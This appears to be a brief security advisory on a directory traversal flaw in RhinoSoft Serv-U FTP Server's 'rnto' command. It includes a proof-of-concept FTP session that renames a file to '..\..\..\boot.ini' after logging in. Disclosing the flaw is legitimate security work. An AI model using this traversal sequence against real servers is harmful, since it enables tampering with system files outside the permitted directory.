|
RhinoSoft Serv-U FTP Server 'rnto' Command Directory Traversal Vulnerability
An attacker can exploit this issue by enticing an unsuspecting victim to connect to a malicious server. The following proof of concept is available: 220 Serv-U FTP Server v7.2 ready... user test 331 User name okay, need password. pass test 230 User logged in, proceed. rnfr any_exist_file.ext 350 File or directory exists, ready for destination name. rnto ..\..\..\boot.ini 250 RNTO command successful. |
|
|
Privacy Statement |
